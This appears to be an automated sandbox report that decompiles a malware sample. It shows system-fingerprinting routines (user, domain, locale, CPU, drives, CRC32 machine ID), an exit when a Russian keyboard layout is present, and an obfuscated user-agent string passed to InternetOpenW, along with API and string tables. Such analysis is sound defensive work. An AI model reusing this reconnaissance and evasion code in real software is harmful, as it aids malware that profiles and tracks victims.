								 *(_t279 + 0x50) = _t220;
								_t221 = E0FE67410(_t260, 0x80000002, L"SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", L"productName", _t220, 0x80); // executed
								if(_t221 == 0) {
									_push(_t260);
									E0FE67410(_t260, 0x80000002, L"SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion", L"productName",  *(_t279 + 0x50), 0x80);
									wsprintfW( *(_t279 + 0x50), L"error");
									_t281 = _t281 + 8;
								}
							}
							if( *((intOrPtr*)(_t279 + 0x54)) == 0) {
								L44:
								if( *((intOrPtr*)(_t279 + 0x24)) != 0) {
									_v28 = 0;
									_t216 = E0FE67B70(_t279 + 0x2c,  &_v28); // executed
									if(_t216 == 0) {
										 *((intOrPtr*)(_t279 + 0x24)) = _t216;
									}
								}
								if( *((intOrPtr*)(_t279 + 0x60)) != 0) {
									_t190 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x68) = _t190;
									_t191 = VirtualAlloc(0, 0xe0c, 0x3000, 4); // executed
									_t276 = _t191;
									GetWindowsDirectoryW(_t276, 0x100);
									_t66 = _t276 + 0x600; // 0x600
									_t266 = _t66;
									 *((short*)(_t276 + 6)) = 0;
									_t68 = _t276 + 0x400; // 0x400
									_t69 = _t276 + 0x604; // 0x604
									_t70 = _t276 + 0x608; // 0x608
									_t71 = _t276 + 0x200; // 0x200
									GetVolumeInformationW(_t276, _t71, 0x100, _t266, _t70, _t69, _t68, 0x100); // executed
									_push(_t266);
									_t72 = _t276 + 0x60c; // 0x60c
									_t260 = _t72;
									_t199 = E0FE67410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"ProcessorNameString", _t260, 0x80); // executed
									if(_t199 != 0) {
										_t73 = _t276 + 0x60c; // 0x60c
										_t211 = lstrlenW(_t73);
										_t74 = _t276 + 0x60c; // 0x60c
										_t260 = _t74;
										_push(_t260);
										E0FE67410(_t260, 0x80000002, L"HARDWARE\\DESCRIPTION\\System\\CentralProcessor\\0", L"Identifier", _t260 + _t211 * 2, 0x80); // executed
									}
									wsprintfW( *(_t279 + 0x68), L"%d",  *(_t276 + 0x600));
									_t79 = _t276 + 0x60c; // 0x60c
									_t281 = _t281 + 0xc;
									lstrcatW( *(_t279 + 0x68), _t79);
									_t204 = GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "RtlComputeCrc32");
									_v28 = _t204;
									if(_t204 == 0) {
										 *(_t279 + 0x6c) = 0;
									} else {
										 *(_t279 + 0x6c) = _v28(0x29a,  *(_t279 + 0x68), lstrlenW( *(_t279 + 0x68)) + _t207);
									}
									 *(_t279 + 0x70) =  *(_t276 + 0x600);
									VirtualFree(_t276, 0, 0x8000); // executed
								}
								if( *((intOrPtr*)(_t279 + 0x74)) == 0) {
									L67:
									if( *(_t279 + 0x80) == 0) {
										L72:
										return 1;
									}
									_t154 = VirtualAlloc(0, 0x81, 0x3000, 4); // executed
									 *(_t279 + 0x84) = _t154;
									if(_t154 == 0) {
										L71:
										 *(_t279 + 0x80) = 0;
										goto L72;
									}
									_push(_t260);
									_t155 = E0FE66FF0(_t154); // executed
									if(_t155 != 0) {
										goto L72;
									}
									VirtualFree( *(_t279 + 0x84), _t155, 0x8000); // executed
									goto L71;
								} else {
									_v68 = L"UNKNOWN";
									_v64 = L"NO_ROOT_DIR";
									_v60 = L"REMOVABLE";
									_v56 = L"FIXED";
									_v52 = L"REMOTE";
									_v48 = L"CDROM";
									_v44 = L"RAMDISK";
									_t157 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
									 *(_t279 + 0x7c) = _t157;
									_t261 =  &_v132;
									_t158 = 0x41;
									do {
										 *_t261 = _t158;
										_t261 = _t261 + 2;
										_t158 = _t158 + 1;
									} while (_t158 <= 0x5a);
									_t159 =  *L"?:\\"; // 0x3a003f
									_v40 = _t159;
									_t160 =  *0xfe6f350; // 0x5c
									_v36 = _t160;
									_t161 = 0;
									_v24 = 0;
									do {
										_v40 =  *((intOrPtr*)(_t280 + _t161 * 2 - 0x80));
										_t164 = GetDriveTypeW( &_v40); // executed
										_t270 = _t164;
										if(_t270 > 2 && _t270 != 5) {
											_v36 = 0;
											lstrcatW( *(_t279 + 0x7c),  &_v40);
											_v36 = 0x5c;
											lstrcatW( *(_t279 + 0x7c),  *(_t280 + _t270 * 4 - 0x40));
											lstrcatW( *(_t279 + 0x7c), "_");
											_t178 = GetDiskFreeSpaceW( &_v40,  &_v28,  &_v20,  &_v12,  &_v16); // executed
											if(_t178 == 0) {
												lstrcatW( *(_t279 + 0x7c), L"0,");
												goto L64;
											}
											_v8 = E0FE68AB0(_v16, 0, _v28 * _v20, 0);
											_t256 = _t267;
											_t181 = E0FE68AB0(_v12, 0, _v28 * _v20, 0);
											_t274 = _v8;
											_v32 = _t274 - _t181;
											asm("sbb eax, edx");
											_v8 = _t256;
											_t183 = lstrlenW( *(_t279 + 0x7c));
											_push(_t256);
											wsprintfW( &(( *(_t279 + 0x7c))[_t183]), L"%I64u/", _t274);
											_t186 = lstrlenW( *(_t279 + 0x7c));
											_push(_v8);
											wsprintfW( &(( *(_t279 + 0x7c))[_t186]), L"%I64u", _v32);
											_t281 = _t281 + 0x20;
											lstrcatW( *(_t279 + 0x7c), ",");
										}
										_t161 = _v24 + 1;
										_v24 = _t161;
									} while (_t161 < 0x1b);
									_t166 = lstrlenW( *(_t279 + 0x7c));
									_t260 =  *(_t279 + 0x7c);
									 *((short*)(_t260 + _t166 * 2 - 2)) = 0;
									goto L67;
								}
							} else {
								__imp__GetNativeSystemInfo( &_v76); // executed
								_t218 = VirtualAlloc(0, 0x40, 0x3000, 4); // executed
								_t260 = _v76 & 0x0000ffff;
								 *(_t279 + 0x5c) = _t218;
								if(_t260 > 9) {
									L42:
									_push(L"Unknown");
									L43:
									wsprintfW(_t218, ??);
									_t281 = _t281 + 8;
									goto L44;
								}
								_t260 =  *(_t260 + E0FE67B60) & 0x000000ff;
								switch( *((intOrPtr*)(_t260 * 4 +  &M0FE67B4C))) {
									case 0:
										_push(L"x86");
										goto L43;
									case 1:
										_push(L"ARM");
										goto L43;
									case 2:
										_push(L"Itanium");
										goto L43;
									case 3:
										_push(L"x64");
										goto L43;
									case 4:
										goto L42;
								}
							}
						}
						_t224 = VirtualAlloc(0, 0x8a, 0x3000, 4); // executed
						_v8 = _t224;
						_v20 = _t224 + 0xe;
						_t226 = VirtualAlloc(0, 4, 0x3000, 4); // executed
						 *(_t279 + 0x44) = _t226;
						_t277 = 1;
						_v24 = 1;
						do {
							wsprintfW(_v8, L"%d", _t277);
							_t281 = _t281 + 0xc;
							_v16 = 0;
							_t277 = _t277 + 1;
							_t229 = RegOpenKeyExW(0x80000001, L"Keyboard Layout\\Preload", 0, 0x20019,  &_v12); // executed
							if(_t229 != 0) {
								L27:
								_t230 = 0;
								_v24 = 0;
								goto L28;
							}
							_v28 = 0x80;
							_t234 = RegQueryValueExW(_v12, _v8, 0, 0, _v20,  &_v28); // executed
							if(_t234 != 0) {
								GetLastError();
							} else {
								_v16 = 1;
							}
							RegCloseKey(_v12); // executed
							if(_v16 == 0) {
								goto L27;
							} else {
								if(lstrcmpiW(_v20, L"00000419") == 0) {
									_t218 = wsprintfW( *(_t279 + 0x44), "1");
									_t281 = _t281 + 8;
									ExitProcess(0);
								}
								_t230 = _v24;
							}
							L28:
						} while (_t277 != 9 && _t230 != 0);
						wsprintfW( *(_t279 + 0x44), "0");
						_t281 = _t281 + 8;
						VirtualFree(_v8, 0, 0x8000); // executed
						goto L31;
					}
					_t238 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					_v20 = _t238;
					 *(_t279 + 0x38) = _t238;
					_v12 = 0;
					_t240 = RegOpenKeyExW(0x80000001, L"Control Panel\\International", 0, 0x20019,  &_v8); // executed
					if(_t240 != 0) {
						L17:
						 *(_t279 + 0x30) = 0;
						VirtualFree( *(_t279 + 0x38), 0, 0x8000);
						goto L18;
					}
					_v24 = 0x40;
					_t243 = RegQueryValueExW(_v8, L"LocaleName", 0, 0, _v20,  &_v24); // executed
					if(_t243 != 0) {
						GetLastError();
					} else {
						_v12 = 1;
					}
					RegCloseKey(_v8); // executed
					if(_v12 != 0) {
						goto L18;
					} else {
						goto L17;
					}
				} else {
					_t246 = VirtualAlloc(0, 0x80, 0x3000, 4); // executed
					 *(_t279 + 0x20) = _t246;
					if(_t246 == 0) {
						goto L11;
					}
					_push(_t260);
					_t247 = E0FE67410(_t260, 0x80000002, L"SYSTEM\\CurrentControlSet\\services\\Tcpip\\Parameters", L"Domain", _t246, 0x80); // executed
					if(_t247 == 0) {
						wsprintfW( *(_t279 + 0x20), L"undefined");
						L10:
						_t281 = _t281 + 8;
						goto L11;
					}
					_t249 =  *(_t279 + 0x20);
					if( *_t249 != 0) {
						goto L11;
					}
					wsprintfW(_t249, L"WORKGROUP");
					goto L10;
				}
			}

0x0fe67490
0x0fe67490
0x0fe6749b
0x0fe674a7
0x0fe674b7
0x0fe674b9
0x0fe674bc
0x0fe674c1
0x0fe674c8
0x0fe674c8
0x0fe674d2
0x0fe674df
0x0fe674e6
0x0fe674e8
0x0fe674eb
0x0fe674f0
0x0fe674f0
0x0fe67500
0x0fe67556
0x0fe6755a
0x0fe675f5
0x0fe675f9
0x0fe676f9
0x0fe676fd
0x0fe6770d
0x0fe6770f
0x0fe67725
0x0fe67728
0x0fe6772f
0x0fe67731
0x0fe67749
0x0fe67756
0x0fe67758
0x0fe67758
0x0fe6772f
0x0fe6775f
0x0fe677ce
0x0fe677d2
0x0fe677d7
0x0fe677e3
0x0fe677ea
0x0fe677ec
0x0fe677ec
0x0fe677ea
0x0fe677f3
0x0fe67807
0x0fe67817
0x0fe6781a
0x0fe6781c
0x0fe67824
0x0fe6782c
0x0fe6782c
0x0fe67837
0x0fe6783b
0x0fe67842
0x0fe67849
0x0fe67856
0x0fe6785e
0x0fe67864
0x0fe6786a
0x0fe6786a
0x0fe67880
0x0fe67887
0x0fe67889
0x0fe67890
0x0fe67896
0x0fe67896
0x0fe6789c
0x0fe678b5
0x0fe678b5
0x0fe678c8
0x0fe678d0
0x0fe678d6
0x0fe678dd
0x0fe678f0
0x0fe678f6
0x0fe678fb
0x0fe67919
0x0fe678fd
0x0fe67914
0x0fe67914
0x0fe6792e
0x0fe67931
0x0fe67931
0x0fe67943
0x0fe67af2
0x0fe67af9
0x0fe67b42
0x0fe67b4b
0x0fe67b4b
0x0fe67b09
0x0fe67b0f
0x0fe67b17
0x0fe67b36
0x0fe67b36
0x00000000
0x0fe67b36
0x0fe67b19
0x0fe67b1b
0x0fe67b22
0x00000000
0x00000000
0x0fe67b30
0x00000000
0x0fe67949
0x0fe67957
0x0fe6795e
0x0fe67965
0x0fe6796c
0x0fe67973
0x0fe6797a
0x0fe67981
0x0fe67988
0x0fe6798e
0x0fe67991
0x0fe67994
0x0fe679a0
0x0fe679a0
0x0fe679a3
0x0fe679a6
0x0fe679a7
0x0fe679ad
0x0fe679b2
0x0fe679b5
0x0fe679ba
0x0fe679bd
0x0fe679bf
0x0fe679c2
0x0fe679c7
0x0fe679cf
0x0fe679d5
0x0fe679da
0x0fe679eb
0x0fe679f6
0x0fe67a04
0x0fe67a08
0x0fe67a12
0x0fe67a28
0x0fe67a30
0x0fe67acb
0x00000000
0x0fe67acb
0x0fe67a52
0x0fe67a55
0x0fe67a57
0x0fe67a5c
0x0fe67a68
0x0fe67a6b
0x0fe67a6d
0x0fe67a70
0x0fe67a79
0x0fe67a8a
0x0fe67a98
0x0fe67a9a
0x0fe67aac
0x0fe67ab4
0x0fe67abf
0x0fe67abf
0x0fe67ad6
0x0fe67ad7
0x0fe67ada
0x0fe67ae6
0x0fe67ae8
0x0fe67aed
0x00000000
0x0fe67aed
0x0fe67761
0x0fe67765
0x0fe67776
0x0fe67778
0x0fe6777c
0x0fe67782
0x0fe677c3
0x0fe677c3
0x0fe677c8
0x0fe677c9
0x0fe677cb
0x00000000
0x0fe677cb
0x0fe67784
0x0fe6778b
0x00000000
0x0fe677bc
0x00000000
0x00000000
0x0fe677ae
0x00000000
0x00000000
0x0fe677b5
0x00000000
0x00000000
0x0fe677a7
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe6778b
0x0fe6775f
0x0fe6760d
0x0fe67616
0x0fe67620
0x0fe67623
0x0fe67625
0x0fe67628
0x0fe6762d
0x0fe67634
0x0fe6763d
0x0fe6763f
0x0fe67642
0x0fe6764c
0x0fe6765f
0x0fe67667
0x0fe676c4
0x0fe676c4
0x0fe676c6
0x00000000
0x0fe676c6
0x0fe6766c
0x0fe67681
0x0fe67689
0x0fe67694
0x0fe6768b
0x0fe6768b
0x0fe6768b
0x0fe6769d
0x0fe676a7
0x00000000
0x0fe676a9
0x0fe676b9
0x0fe6779a
0x0fe6779c
0x0fe677a1
0x0fe677a1
0x0fe676bf
0x0fe676bf
0x0fe676c9
0x0fe676c9
0x0fe676de
0x0fe676e0
0x0fe676ed
0x00000000
0x0fe676f3
0x0fe6756e
0x0fe67570
0x0fe67573
0x0fe6758b
0x0fe67592
0x0fe6759a
0x0fe675de
0x0fe675e8
0x0fe675ef
0x00000000
0x0fe675ef
0x0fe6759f
0x0fe675b6
0x0fe675be
0x0fe675c9
0x0fe675c0
0x0fe675c0
0x0fe675c0
0x0fe675d2
0x0fe675dc
0x00000000
0x00000000
0x00000000
0x00000000
0x0fe67502
0x0fe67510
0x0fe67512
0x0fe67517
0x00000000
0x00000000
0x0fe67519
0x0fe6752f
0x0fe67536
0x0fe67551
0x0fe67551
0x0fe67553
0x00000000
0x0fe67553
0x0fe67538
0x0fe6753f
0x00000000
0x00000000
0x0fe67551
0x00000000
0x0fe67551

APIs

VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0FE674B7
GetUserNameW.ADVAPI32(00000000,?), ref: 0FE674C8
VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0FE674E6
GetComputerNameW.KERNEL32 ref: 0FE674F0
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FE67510
wsprintfW.USER32 ref: 0FE67551
VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0FE6756E
RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0FE67592
RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0FE64810,?), ref: 0FE675B6
GetLastError.KERNEL32 ref: 0FE675C9
RegCloseKey.KERNEL32(00000000), ref: 0FE675D2
VirtualFree.KERNEL32(?,00000000,00008000), ref: 0FE675EF
VirtualAlloc.KERNEL32(00000000,0000008A,00003000,00000004), ref: 0FE6760D
VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FE67623
wsprintfW.USER32 ref: 0FE6763D
RegOpenKeyExW.KERNEL32(80000001,Keyboard Layout\Preload,00000000,00020019,?), ref: 0FE6765F
RegQueryValueExW.KERNEL32(?,00000000,00000000,00000000,0FE64810,?), ref: 0FE67681
GetLastError.KERNEL32 ref: 0FE67694
RegCloseKey.KERNEL32(?), ref: 0FE6769D
lstrcmpiW.KERNEL32(0FE64810,00000419), ref: 0FE676B1
wsprintfW.USER32 ref: 0FE676DE
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE676ED
VirtualAlloc.KERNEL32(00000000,00000082,00003000,00000004), ref: 0FE6770D
wsprintfW.USER32 ref: 0FE67756
GetNativeSystemInfo.KERNEL32(?), ref: 0FE67765
VirtualAlloc.KERNEL32(00000000,00000040,00003000,00000004), ref: 0FE67776
wsprintfW.USER32 ref: 0FE6779A
ExitProcess.KERNEL32 ref: 0FE677A1
wsprintfW.USER32 ref: 0FE677C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FE67807
VirtualAlloc.KERNEL32(00000000,00000E0C,00003000,00000004), ref: 0FE6781A
GetWindowsDirectoryW.KERNEL32(00000000,00000100), ref: 0FE67824
GetVolumeInformationW.KERNEL32(00000000,00000200,00000100,00000600,00000608,00000604,00000400,00000100), ref: 0FE6785E
lstrlenW.KERNEL32(0000060C,80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,ProcessorNameString,0000060C,00000080), ref: 0FE67890
wsprintfW.USER32 ref: 0FE678C8
lstrcatW.KERNEL32(?,0000060C), ref: 0FE678DD
GetModuleHandleW.KERNEL32(ntdll.dll,RtlComputeCrc32), ref: 0FE678E9
GetProcAddress.KERNEL32(00000000), ref: 0FE678F0
lstrlenW.KERNEL32(?), ref: 0FE67900
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0FE67931

Part of subcall function 0FE67B70: VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,747166A0,?,775EC0B0), ref: 0FE67B8D
Part of subcall function 0FE67B70: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004), ref: 0FE67C01
Part of subcall function 0FE67B70: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0FE67C16
Part of subcall function 0FE67B70: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0FE67C2C

VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0FE67988
GetDriveTypeW.KERNEL32(?), ref: 0FE679CF
lstrcatW.KERNEL32(?,?), ref: 0FE679F6
lstrcatW.KERNEL32(?,0FE7030C), ref: 0FE67A08
lstrcatW.KERNEL32(?,0FE70380), ref: 0FE67A12
GetDiskFreeSpaceW.KERNEL32(?,?,0FE64810,?,00000000), ref: 0FE67A28
lstrlenW.KERNEL32(?,?,00000000,0FE64810,00000000,00000000,00000000,0FE64810,00000000), ref: 0FE67A70
wsprintfW.USER32 ref: 0FE67A8A
lstrlenW.KERNEL32(?), ref: 0FE67A98
wsprintfW.USER32 ref: 0FE67AAC
lstrcatW.KERNEL32(?,0FE703A0), ref: 0FE67ABF
lstrcatW.KERNEL32(?,0FE703A4), ref: 0FE67ACB
lstrlenW.KERNEL32(?), ref: 0FE67AE6
VirtualAlloc.KERNEL32(00000000,00000081,00003000,00000004), ref: 0FE67B09
VirtualFree.KERNELBASE(?,00000000,00008000,00000000), ref: 0FE67B30

Strings

error, xrefs: 0FE6774E
%I64u/, xrefs: 0FE67A84
ntdll.dll, xrefs: 0FE678E4
HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 0FE67876, 0FE678AB
?:\, xrefs: 0FE679AD
Control Panel\International, xrefs: 0FE67581
Unknown, xrefs: 0FE677C3
x64, xrefs: 0FE677A7
x86, xrefs: 0FE677BC
ARM, xrefs: 0FE677AE
Keyboard Layout\Preload, xrefs: 0FE67655
SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0FE6771B
LocaleName, xrefs: 0FE675AE
%I64u, xrefs: 0FE67AA3
productName, xrefs: 0FE67716, 0FE6773A
Identifier, xrefs: 0FE678A6
@, xrefs: 0FE6759F
00000419, xrefs: 0FE676A9
Itanium, xrefs: 0FE677B5
WORKGROUP, xrefs: 0FE67541
Domain, xrefs: 0FE67520
ProcessorNameString, xrefs: 0FE67871
iqt, xrefs: 0FE676B1
SYSTEM\CurrentControlSet\services\Tcpip\Parameters, xrefs: 0FE67525
RtlComputeCrc32, xrefs: 0FE678DF
undefined, xrefs: 0FE67549
SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion, xrefs: 0FE6773F

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: Virtual$Alloc$wsprintf$Freelstrcat$lstrlen$CloseErrorLastNameOpenQueryValue$AddressComputerCreateDirectoryDiskDriveExitHandleInfoInformationModuleNativeProcProcessSnapshotSpaceSystemToolhelp32TypeUserVolumeWindowslstrcmpi
String ID: iqt$%I64u$%I64u/$00000419$?:\$@$ARM$Control Panel\International$Domain$HARDWARE\DESCRIPTION\System\CentralProcessor\0$Identifier$Itanium$Keyboard Layout\Preload$LocaleName$ProcessorNameString$RtlComputeCrc32$SOFTWARE\Microsoft\Windows NT\CurrentVersion$SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion$SYSTEM\CurrentControlSet\services\Tcpip\Parameters$Unknown$WORKGROUP$error$ntdll.dll$productName$undefined$x64$x86
API String ID: 153366582-671888634
Opcode ID: 015039a9b064f51fb91e0c2f909d5420a31506639d5490c08c0002272130d53b
Instruction ID: 53412c60a41c44321227648f10c9b3040b738eca471fe3a3609cadbdfe6f3744
Opcode Fuzzy Hash: 015039a9b064f51fb91e0c2f909d5420a31506639d5490c08c0002272130d53b
Instruction Fuzzy Hash: 5112B070A80309BFEB209FA1CC4AFAABBB5FF04B49F101529F641B6191DBB5B514CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0FE67E40 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FE67E40(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x0fe67e58
0x0fe67e64
0x0fe67e6f
0x0fe67e79
0x0fe67e83
0x0fe67e8d
0x0fe67e97
0x0fe67ea1
0x0fe67eab
0x0fe67eb5
0x0fe67ebf
0x0fe67ec9
0x0fe67ed3
0x0fe67edd
0x0fe67ee7
0x0fe67ef1
0x0fe67efb
0x0fe67f05
0x0fe67f0f
0x0fe67f19
0x0fe67f23
0x0fe67f2d
0x0fe67f37
0x0fe67f41
0x0fe67f4b
0x0fe67f52
0x0fe67f59
0x0fe67f60
0x0fe67f67
0x0fe67f6e
0x0fe67f75
0x0fe67f7c
0x0fe67f83
0x0fe67f8a
0x0fe67f91
0x0fe67f98
0x0fe67f9f
0x0fe67fa6
0x0fe67fad
0x0fe67fb4
0x0fe67fbb
0x0fe67fc2
0x0fe67fc9
0x0fe67fd0
0x0fe67fd7
0x0fe67fde
0x0fe67fe5
0x0fe67fec
0x0fe67ff3
0x0fe67ffa
0x0fe68001
0x0fe68008
0x0fe6800f
0x0fe68016
0x0fe6801d
0x0fe68024
0x0fe68026
0x0fe6802b
0x0fe6803d
0x0fe6803f
0x00000000
0x0fe6803f
0x0fe68048

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0FE68024
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0FE6803D

Strings

6, xrefs: 0FE67EDD
l, xrefs: 0FE67E79
7, xrefs: 0FE68016
i, xrefs: 0FE67EAB
0, xrefs: 0FE67E97
a, xrefs: 0FE67E83
, xrefs: 0FE67FAD
e, xrefs: 0FE67FC2
M, xrefs: 0FE67E64
5, xrefs: 0FE67FC9
), xrefs: 0FE67F0F
, xrefs: 0FE67EF1
a, xrefs: 0FE67FFA
5, xrefs: 0FE67E8D
t, xrefs: 0FE67F4B
, xrefs: 0FE67FF3
(, xrefs: 0FE67EA1
7, xrefs: 0FE67F59
3, xrefs: 0FE67F60
i, xrefs: 0FE67F8A
K, xrefs: 0FE67F41
w, xrefs: 0FE67EBF
., xrefs: 0FE67FD0
G, xrefs: 0FE67F98
8, xrefs: 0FE67FEC
5, xrefs: 0FE6800F
T, xrefs: 0FE67ED3
3, xrefs: 0FE67FE5
K, xrefs: 0FE67F6E
8, xrefs: 0FE67FDE
c, xrefs: 0FE67F9F
h, xrefs: 0FE67FB4
T, xrefs: 0FE67F75
e, xrefs: 0FE67F91
a, xrefs: 0FE68001
z, xrefs: 0FE67E6F
o, xrefs: 0FE67FA6
A, xrefs: 0FE67F19
o, xrefs: 0FE67FBB
6, xrefs: 0FE67F05
d, xrefs: 0FE67EB5
, xrefs: 0FE67F83
p, xrefs: 0FE67F23
e, xrefs: 0FE67F37
., xrefs: 0FE67FD7
1, xrefs: 0FE67EE7
O, xrefs: 0FE67EFB
i, xrefs: 0FE68008
5, xrefs: 0FE67F52
, xrefs: 0FE67EC9
, xrefs: 0FE67F67
e, xrefs: 0FE67F2D
3, xrefs: 0FE6801D
L, xrefs: 0FE67F7C

Memory Dump Source

Source File: 00000002.00000002.370313437.000000000FE61000.00000020.00000001.01000000.00000004.sdmp, Offset: 0FE60000, based on PE: true

Associated: 00000002.00000002.370270818.000000000FE60000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370323598.000000000FE6A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370333139.000000000FE72000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.370340833.000000000FE74000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_fe60000_ssapst.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: bca458d6353cb41ee5b0361493a27f7c895f9abf0cc9346a457c1b16126c89d5
Instruction ID: fef4922f0f648e7051b5ff883e6c893e93f48a0c7e9ec15a3c5f8594ba664a3d
Opcode Fuzzy Hash: bca458d6353cb41ee5b0361493a27f7c895f9abf0cc9346a457c1b16126c89d5
Instruction Fuzzy Hash: 3D41B8B4811358DEEB21CF91999879EBFF6BB04748F50819EC5086B201C7F60A89CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0FE670A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0FE670A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
